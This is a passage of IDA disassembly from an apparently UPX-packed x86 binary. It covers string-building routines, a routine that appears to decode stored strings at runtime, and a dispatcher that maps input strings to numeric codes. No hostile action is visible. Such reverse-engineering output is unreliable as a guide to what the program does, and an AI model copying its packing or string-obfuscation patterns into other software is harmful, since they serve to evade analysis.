jnz short loc_40F8C0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push ebx
rep movsb
call sub_4198AE
mov edi, ebp
add esp, 4
dec edi
loc_40F8E2: ; CODE XREF: sub_40F730+1B8�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40F8E2
mov ax, word_424544
mov [edi], ax
pop edi
pop esi
mov eax, ebp
pop ebp
pop ebx
pop ecx
retn
sub_40F730 endp
; ---------------------------------------------------------------------------
align 10h
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_40F910: ; DATA XREF: UPX0:off_424534�o
test byte ptr [esp+4], 1
push esi
mov esi, ecx
mov dword ptr [esi], offset off_424534
jz short loc_40F929
push esi
call sub_41930D
add esp, 4
loc_40F929: ; CODE XREF: UPX0:0040F91E�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
loc_40F930: ; DATA XREF: UPX0:0042454C�o
push esi
mov esi, ecx
mov eax, [esi+110h]
test eax, eax
jz short loc_40F946
push eax
call sub_4198AE
add esp, 4
loc_40F946: ; CODE XREF: UPX0:0040F93B�j
movzx eax, word ptr [esi+10Ch]
push eax
call sub_4191BC
movzx ecx, word ptr [esi+10Ch]
add esp, 4
push ecx
mov ecx, [esp+0Ch]
push eax
mov [esi+110h], eax
call sub_4085A0
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F980 proc near ; DATA XREF: UPX0:00424554�o
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov eax, [esi+110h]
test eax, eax
push edi
jz short loc_40F997
push eax
call sub_4198AE
add esp, 4
loc_40F997: ; CODE XREF: sub_40F980+C�j
movzx eax, word ptr [esi+10Ch]
push eax
call sub_4191BC
movzx ecx, word ptr [esi+10Ch]
mov edx, [esp+0Ch+arg_0]
mov [esi+110h], eax
mov esi, [edx+110h]
mov edi, eax
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
add esp, 4
and ecx, 3
rep movsb
pop edi
pop esi
retn 4
sub_40F980 endp
; ---------------------------------------------------------------------------
align 10h
loc_40F9E0: ; DATA XREF: UPX0:off_424548�o
push esi
mov esi, ecx
call sub_40FA00
test byte ptr [esp+8], 1
jz short loc_40F9F8
push esi
call sub_41930D
add esp, 4
loc_40F9F8: ; CODE XREF: UPX0:0040F9ED�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FA00 proc near ; CODE XREF: UPX0:0040F9E3�p
push esi
mov esi, ecx
mov eax, [esi+110h]
test eax, eax
mov dword ptr [esi], offset off_424548
jz short loc_40FA1C
push eax
call sub_4198AE
add esp, 4
loc_40FA1C: ; CODE XREF: sub_40FA00+11�j
mov dword ptr [esi], offset off_424534
pop esi
retn
sub_40FA00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FA30 proc near ; CODE XREF: sub_410490+89�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
push eax
mov esi, ecx
call sub_40F6D0
xor eax, eax
lea edi, [esi+112h]
mov dword ptr [esi], offset off_424558
mov ecx, 40h
rep stosd
pop edi
mov eax, esi
pop esi
retn 4
sub_40FA30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FA60 proc near ; DATA XREF: UPX0:00424560�o
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
mov ebx, ecx
push 100h
mov [esp+18h+var_4], ebx
call sub_4191BC
add esp, 4
push 0Bh
push offset dword_4288D4
mov ecx, offset off_42AE60
mov ebp, eax
call sub_406AE0
mov edx, ebp
lea ecx, [ecx+0]
loc_40FA90: ; CODE XREF: sub_40FA60+38�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40FA90
mov ecx, ebx
call sub_40F730
mov edx, eax
loc_40FAA3: ; CODE XREF: sub_40FA60+48�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40FAA3
mov edi, ebp
sub eax, edx
dec edi
nop
loc_40FAB0: ; CODE XREF: sub_40FA60+56�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FAB0
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
push 0Ch
rep movsb
push offset dword_4288E0
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
jmp short loc_40FAE0
; ---------------------------------------------------------------------------
align 10h
loc_40FAE0: ; CODE XREF: sub_40FA60+7B�j
; sub_40FA60+85�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FAE0
mov edi, ebp
sub eax, ecx
mov esi, ecx
dec edi
mov edi, edi
loc_40FAF0: ; CODE XREF: sub_40FA60+96�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FAF0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
movzx esi, word ptr [ebx+110h]
push 20h
call sub_4191BC
push esi
mov ebx, eax
push offset dword_4243F0
push ebx
call sub_419B8A
mov eax, ebx
add esp, 10h
mov esi, eax
lea esp, [esp+0]
loc_40FB30: ; CODE XREF: sub_40FA60+D5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40FB30
mov edi, ebp
sub eax, esi
dec edi
lea esp, [esp+0]
loc_40FB40: ; CODE XREF: sub_40FA60+E6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FB40
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push ebx
rep movsb
call sub_4198AE
mov edi, ebp
add esp, 4
dec edi
loc_40FB62: ; CODE XREF: sub_40FA60+108�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40FB62
mov ax, word_424544
push 0Ah
push offset dword_4288EC
mov ecx, offset off_42AE60
mov [edi], ax
call sub_406AE0
mov ecx, eax
loc_40FB86: ; CODE XREF: sub_40FA60+12B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FB86
mov edi, ebp
sub eax, ecx
mov esi, ecx
dec edi
loc_40FB94: ; CODE XREF: sub_40FA60+13A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FB94
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [esp+14h+var_4]
and ecx, 3
add eax, 112h
rep movsb
mov ecx, eax
loc_40FBB5: ; CODE XREF: sub_40FA60+15A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FBB5
mov edi, ebp
sub eax, ecx
mov esi, ecx
dec edi
loc_40FBC3: ; CODE XREF: sub_40FA60+169�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FBC3
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 3
rep movsb
push offset dword_4288F8
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40FBF0: ; CODE XREF: sub_40FA60+195�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FBF0
mov edi, ebp
sub eax, ecx
mov esi, ecx
dec edi
mov edi, edi
loc_40FC00: ; CODE XREF: sub_40FA60+1A6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FC00
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
mov eax, ebp
pop ebp
pop ebx
pop ecx
retn
sub_40FA60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FC20 proc near ; DATA XREF: UPX0:00424564�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dx, [eax+110h]
mov [ecx+110h], dx
add eax, 112h
lea edx, [ecx+112h]
sub edx, eax
nop
loc_40FC40: ; CODE XREF: sub_40FC20+28�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40FC40
retn 4
sub_40FC20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FC50 proc near ; CODE XREF: sub_410490+6E�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push eax
mov esi, ecx
call sub_40F6D0
mov dword ptr [esi], offset off_424568
mov eax, esi
pop esi
retn 4
sub_40FC50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FC70 proc near ; DATA XREF: UPX0:0042456C�o
; UPX0:00424590�o
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov ecx, [esp+4+arg_0]
mov eax, [ecx]
push 0
call dword ptr [eax+4]
add esi, 110h
mov ecx, eax
sub esi, eax
loc_40FC88: ; CODE XREF: sub_40FC70+20�j
mov dl, [ecx]
mov [esi+ecx], dl
inc ecx
test dl, dl
jnz short loc_40FC88
push eax
call sub_4198AE
add esp, 4
pop esi
retn 4
sub_40FC70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FCA0 proc near ; DATA XREF: UPX0:00424570�o
push ebx
push ebp
push esi
push edi
push 100h
mov ebp, ecx
call sub_4191BC
add esp, 4
push 0Fh
push offset dword_4288FC
mov ecx, offset off_42AE60
mov ebx, eax
call sub_406AE0
mov edx, ebx
loc_40FCC8: ; CODE XREF: sub_40FCA0+30�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40FCC8
mov ecx, ebp
call sub_40F730
mov edx, eax
jmp short loc_40FCE0
; ---------------------------------------------------------------------------
align 10h
loc_40FCE0: ; CODE XREF: sub_40FCA0+3B�j
; sub_40FCA0+45�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40FCE0
mov edi, ebx
sub eax, edx
dec edi
lea esp, [esp+0]
loc_40FCF0: ; CODE XREF: sub_40FCA0+56�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FCF0
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
push 7
rep movsb
push offset dword_42890C
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
jmp short loc_40FD20
; ---------------------------------------------------------------------------
align 10h
loc_40FD20: ; CODE XREF: sub_40FCA0+7B�j
; sub_40FCA0+85�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FD20
mov edi, ebx
sub eax, ecx
mov esi, ecx
dec edi
mov edi, edi
loc_40FD30: ; CODE XREF: sub_40FCA0+96�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FD30
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+110h]
rep movsb
mov ecx, eax
mov edi, edi
loc_40FD50: ; CODE XREF: sub_40FCA0+B5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FD50
mov edi, ebx
sub eax, ecx
mov esi, ecx
dec edi
mov edi, edi
loc_40FD60: ; CODE XREF: sub_40FCA0+C6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FD60
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 3
rep movsb
push offset dword_428914
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40FD90: ; CODE XREF: sub_40FCA0+F5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FD90
mov edi, ebx
sub eax, ecx
mov esi, ecx
dec edi
mov edi, edi
loc_40FDA0: ; CODE XREF: sub_40FCA0+106�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FDA0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
pop ebp
mov eax, ebx
pop ebx
retn
sub_40FCA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FDC0 proc near ; CODE XREF: sub_410490+34�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push eax
mov esi, ecx
call sub_40F6D0
mov dword ptr [esi], offset off_424578
mov eax, esi
pop esi
retn 4
sub_40FDC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FDE0 proc near ; DATA XREF: UPX0:00424580�o
var_4 = dword ptr -4
push ecx
push ebp
push esi
push edi
mov esi, ecx
push 80h
mov [esp+14h+var_4], esi
call sub_4191BC
add esp, 4
push 0Bh
push offset dword_428924
mov ecx, offset off_42AE60
mov ebp, eax
call sub_406AE0
mov edx, ebp
lea esp, [esp+0]
loc_40FE10: ; CODE XREF: sub_40FDE0+38�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40FE10
mov ecx, esi
call sub_40F730
mov ecx, eax
mov edx, eax
push ebx
loc_40FE26: ; CODE XREF: sub_40FDE0+4B�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_40FE26
sub ecx, edx
mov edi, ebp
mov esi, edx
mov edx, ecx
dec edi
pop ebx
loc_40FE37: ; CODE XREF: sub_40FDE0+5D�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FE37
mov ecx, edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
push eax
rep movsb
call sub_4198AE
mov edi, ebp
add esp, 4
dec edi
lea esp, [esp+0]
loc_40FE60: ; CODE XREF: sub_40FDE0+86�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40FE60
mov ax, word_424588
mov [edi], ax
mov cl, byte_42458A
mov eax, [esp+10h+var_4]
add eax, 110h
mov [edi+2], cl
mov ecx, eax
loc_40FE85: ; CODE XREF: sub_40FDE0+AA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FE85
mov edi, ebp
sub eax, ecx
mov esi, ecx
dec edi
loc_40FE93: ; CODE XREF: sub_40FDE0+B9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FE93
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 3
rep movsb
push offset dword_428930
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40FEC0: ; CODE XREF: sub_40FDE0+E5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FEC0
mov edi, ebp
sub eax, ecx
mov esi, ecx
dec edi
mov edi, edi
loc_40FED0: ; CODE XREF: sub_40FDE0+F6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FED0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
mov eax, ebp
pop ebp
pop ecx
retn
sub_40FDE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FEF0 proc near ; DATA XREF: UPX0:00424574�o
; UPX0:00424584�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add eax, 110h
lea edx, [ecx+110h]
sub edx, eax
loc_40FF01: ; CODE XREF: sub_40FEF0+19�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40FF01
retn 4
sub_40FEF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FF10 proc near ; CODE XREF: sub_410490+53�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push eax
mov esi, ecx
call sub_40F6D0
mov dword ptr [esi], offset off_42458C
mov eax, esi
pop esi
retn 4
sub_40FF10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40FF30 proc near ; DATA XREF: UPX0:00424594�o
push ebx
push ebp
push edi
push 100h
mov ebp, ecx
call sub_4191BC
add esp, 4
push 0Ch
push offset dword_428934
mov ecx, offset off_42AE60
mov ebx, eax
call sub_406AE0
mov edx, ebx
loc_40FF57: ; CODE XREF: sub_40FF30+2F�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40FF57
mov ecx, ebp
call sub_40F730
mov edx, eax
lea ebx, [ebx+0]
loc_40FF70: ; CODE XREF: sub_40FF30+45�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40FF70
mov edi, ebx
sub eax, edx
dec edi
lea esp, [esp+0]
loc_40FF80: ; CODE XREF: sub_40FF30+56�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FF80
push esi
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
push 4
rep movsb
push offset dword_428940
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
lea esp, [esp+0]
loc_40FFB0: ; CODE XREF: sub_40FF30+85�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FFB0
mov edi, ebx
sub eax, ecx
mov esi, ecx
dec edi
mov edi, edi
loc_40FFC0: ; CODE XREF: sub_40FF30+96�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FFC0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+110h]
rep movsb
mov ecx, eax
mov edi, edi
loc_40FFE0: ; CODE XREF: sub_40FF30+B5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FFE0
mov edi, ebx
sub eax, ecx
mov esi, ecx
dec edi
mov edi, edi
loc_40FFF0: ; CODE XREF: sub_40FF30+C6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_40FFF0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebx
dec edi
pop esi
lea ebx, [ebx+0]
loc_410010: ; CODE XREF: sub_40FF30+E6�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_410010
mov ax, word_424544
mov [edi], ax
pop edi
pop ebp
mov eax, ebx
pop ebx
retn
sub_40FF30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410030 proc near ; CODE XREF: sub_410F70+12B�p
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 14h
mov eax, dword_42A290
mov [esp+14h+var_4], eax
mov eax, [esp+14h+arg_0]
lea edx, [esp+14h+var_14]
sub edx, eax
loc_410045: ; CODE XREF: sub_410030+1D�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_410045
push ebp
push esi
lea eax, [esp+1Ch+var_14]
push edi
push eax
call sub_41A0AD
add esp, 4
mov ebp, eax
mov edi, offset dword_4245B8
mov esi, ebp
mov ecx, 2
xor edx, edx
repe cmpsb
jnz short loc_410088
pop edi
pop esi
mov eax, 1
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_410088: ; CODE XREF: sub_410030+41�j
mov edi, offset dword_4245B4
mov esi, ebp
mov ecx, 3
xor eax, eax
repe cmpsb
jnz short loc_4100AF
pop edi
pop esi
mov eax, 2
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_4100AF: ; CODE XREF: sub_410030+68�j
mov edi, offset dword_4245B0
mov esi, ebp
mov ecx, 3
xor edx, edx
repe cmpsb
jnz short loc_4100D6
pop edi
pop esi
mov eax, 3
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_4100D6: ; CODE XREF: sub_410030+8F�j
mov edi, offset dword_4245AC
mov esi, ebp
mov ecx, 3
xor eax, eax
repe cmpsb
jnz short loc_4100FD
pop edi
pop esi
mov eax, 4
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_4100FD: ; CODE XREF: sub_410030+B6�j
push 6
push offset dword_428944
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
mov ecx, ebp
push ebx
loc_410113: ; CODE XREF: sub_410030+105�j
mov dl, [ecx]
mov bl, [esi]
mov al, dl
cmp dl, bl
jnz short loc_41013B
test al, al
jz short loc_410137
mov dl, [ecx+1]
mov bl, [esi+1]
mov al, dl
cmp dl, bl
jnz short loc_41013B
add ecx, 2
add esi, 2
test al, al
jnz short loc_410113
loc_410137: ; CODE XREF: sub_410030+EF�j
xor eax, eax
jmp short loc_410140
; ---------------------------------------------------------------------------
loc_41013B: ; CODE XREF: sub_410030+EB�j
; sub_410030+FB�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_410140: ; CODE XREF: sub_410030+109�j
test eax, eax
jnz short loc_41015A
pop ebx
pop edi
pop esi
mov eax, 5
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_41015A: ; CODE XREF: sub_410030+112�j
push 4
push offset loc_42894C
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
mov ecx, ebp
nop
loc_410170: ; CODE XREF: sub_410030+162�j
mov dl, [ecx]
mov bl, [esi]
mov al, dl
cmp dl, bl
jnz short loc_410198
test al, al
jz short loc_410194
mov dl, [ecx+1]
mov bl, [esi+1]
mov al, dl
cmp dl, bl
jnz short loc_410198
add ecx, 2
add esi, 2
test al, al
jnz short loc_410170
loc_410194: ; CODE XREF: sub_410030+14C�j
xor eax, eax
jmp short loc_41019D
; ---------------------------------------------------------------------------
loc_410198: ; CODE XREF: sub_410030+148�j
; sub_410030+158�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_41019D: ; CODE XREF: sub_410030+166�j
test eax, eax
jnz short loc_4101B7
pop ebx
pop edi
pop esi
mov eax, 6
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_4101B7: ; CODE XREF: sub_410030+16F�j
mov edi, offset dword_4245A8
mov esi, ebp
mov ecx, 3
xor eax, eax
repe cmpsb
jnz short loc_4101DF
pop ebx
pop edi
pop esi
mov eax, 7
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_4101DF: ; CODE XREF: sub_410030+197�j
mov edi, offset dword_4245A4
mov esi, ebp
mov ecx, 3
xor edx, edx
repe cmpsb
jnz short loc_410207
pop ebx
pop edi
pop esi
mov eax, 8
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_410207: ; CODE XREF: sub_410030+1BF�j
mov edi, offset dword_4245A0
mov esi, ebp
mov ecx, 3
xor eax, eax
repe cmpsb
jnz short loc_41022F
pop ebx
pop edi
pop esi
mov eax, 9
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_41022F: ; CODE XREF: sub_410030+1E7�j
push 5
push (offset locret_42894F+1)
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
mov ecx, ebp
loc_410244: ; CODE XREF: sub_410030+236�j
mov dl, [ecx]
mov bl, [esi]
mov al, dl
cmp dl, bl
jnz short loc_41026C
test al, al
jz short loc_410268
mov dl, [ecx+1]
mov bl, [esi+1]
mov al, dl
cmp dl, bl
jnz short loc_41026C
add ecx, 2
add esi, 2
test al, al
jnz short loc_410244
loc_410268: ; CODE XREF: sub_410030+220�j
xor eax, eax
jmp short loc_410271
; ---------------------------------------------------------------------------
loc_41026C: ; CODE XREF: sub_410030+21C�j
; sub_410030+22C�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_410271: ; CODE XREF: sub_410030+23A�j
test eax, eax
jnz short loc_41028B
pop ebx
pop edi
pop esi
mov eax, 0Ah
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_41028B: ; CODE XREF: sub_410030+243�j
push 4
push offset dword_428958
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
mov ecx, ebp
loc_4102A0: ; CODE XREF: sub_410030+292�j
mov dl, [ecx]
mov bl, [esi]
mov al, dl
cmp dl, bl
jnz short loc_4102C8
test al, al
jz short loc_4102C4
mov dl, [ecx+1]
mov bl, [esi+1]
mov al, dl
cmp dl, bl
jnz short loc_4102C8
add ecx, 2
add esi, 2
test al, al
jnz short loc_4102A0
loc_4102C4: ; CODE XREF: sub_410030+27C�j
xor eax, eax
jmp short loc_4102CD
; ---------------------------------------------------------------------------
loc_4102C8: ; CODE XREF: sub_410030+278�j
; sub_410030+288�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4102CD: ; CODE XREF: sub_410030+296�j
test eax, eax
jnz short loc_4102E7
pop ebx
pop edi
pop esi
mov eax, 0Bh
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_4102E7: ; CODE XREF: sub_410030+29F�j
push 4
push offset dword_42895C
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
mov ecx, ebp
lea esp, [esp+0]
loc_410300: ; CODE XREF: sub_410030+2F2�j
mov dl, [ecx]
mov bl, [esi]
mov al, dl
cmp dl, bl
jnz short loc_410328
test al, al
jz short loc_410324
mov dl, [ecx+1]
mov bl, [esi+1]
mov al, dl
cmp dl, bl
jnz short loc_410328
add ecx, 2
add esi, 2
test al, al
jnz short loc_410300
loc_410324: ; CODE XREF: sub_410030+2DC�j
xor eax, eax
jmp short loc_41032D
; ---------------------------------------------------------------------------
loc_410328: ; CODE XREF: sub_410030+2D8�j
; sub_410030+2E8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_41032D: ; CODE XREF: sub_410030+2F6�j
test eax, eax
jnz short loc_410347
pop ebx
pop edi
pop esi
mov eax, 0Ch
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_410347: ; CODE XREF: sub_410030+2FF�j
push 6
push offset dword_428960
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
mov ecx, ebp
lea esp, [esp+0]
loc_410360: ; CODE XREF: sub_410030+352�j
mov dl, [ecx]
mov bl, [esi]
mov al, dl
cmp dl, bl
jnz short loc_410388
test al, al
jz short loc_410384
mov dl, [ecx+1]
mov bl, [esi+1]
mov al, dl
cmp dl, bl
jnz short loc_410388
add ecx, 2
add esi, 2
test al, al
jnz short loc_410360
loc_410384: ; CODE XREF: sub_410030+33C�j
xor eax, eax
jmp short loc_41038D
; ---------------------------------------------------------------------------
loc_410388: ; CODE XREF: sub_410030+338�j
; sub_410030+348�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_41038D: ; CODE XREF: sub_410030+356�j
test eax, eax
jnz short loc_4103A7
pop ebx
pop edi
pop esi
mov eax, 0Dh
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_4103A7: ; CODE XREF: sub_410030+35F�j
push 6
push offset dword_428968
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
mov ecx, ebp
lea esp, [esp+0]
loc_4103C0: ; CODE XREF: sub_410030+3B2�j
mov dl, [ecx]
mov bl, [esi]
mov al, dl
cmp dl, bl
jnz short loc_4103E8
test al, al
jz short loc_4103E4
mov dl, [ecx+1]
mov bl, [esi+1]
mov al, dl
cmp dl, bl
jnz short loc_4103E8
add ecx, 2
add esi, 2
test al, al
jnz short loc_4103C0
loc_4103E4: ; CODE XREF: sub_410030+39C�j
xor eax, eax
jmp short loc_4103ED
; ---------------------------------------------------------------------------
loc_4103E8: ; CODE XREF: sub_410030+398�j
; sub_410030+3A8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4103ED: ; CODE XREF: sub_410030+3B6�j
test eax, eax
jnz short loc_410407
pop ebx
pop edi
pop esi
mov eax, 0Eh
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_410407: ; CODE XREF: sub_410030+3BF�j
mov edi, offset dword_42459C
mov esi, ebp
mov ecx, 3
xor eax, eax
repe cmpsb
jnz short loc_41042F
pop ebx
pop edi
pop esi
mov eax, 0Fh
pop ebp
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_41042F: ; CODE XREF: sub_410030+3E7�j
push 4
push offset dword_428970
mov ecx, offset off_42AE60
call sub_406AE0
mov esi, eax
mov ecx, ebp
loc_410444: ; CODE XREF: sub_410030+436�j
mov dl, [ecx]
mov bl, [esi]
mov al, dl
cmp dl, bl
jnz short loc_41046C
test al, al
jz short loc_410468
mov dl, [ecx+1]
mov bl, [esi+1]
mov al, dl
cmp dl, bl
jnz short loc_41046C
add ecx, 2
add esi, 2
test al, al
jnz short loc_410444
loc_410468: ; CODE XREF: sub_410030+420�j
xor eax, eax
jmp short loc_410471
; ---------------------------------------------------------------------------
loc_41046C: ; CODE XREF: sub_410030+41C�j
; sub_410030+42C�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_410471: ; CODE XREF: sub_410030+43A�j
mov ecx, [esp+24h+var_4]
neg eax
pop ebx
sbb eax, eax
pop edi
and eax, 0FFFFFFEFh
pop esi
add eax, 10h
pop ebp
call sub_4192B6
add esp, 14h
retn
sub_410030 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410490 proc near ; CODE XREF: sub_410DB0+6E�p
; sub_411360+3F9�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
movzx eax, word ptr [edi+104h]
dec eax
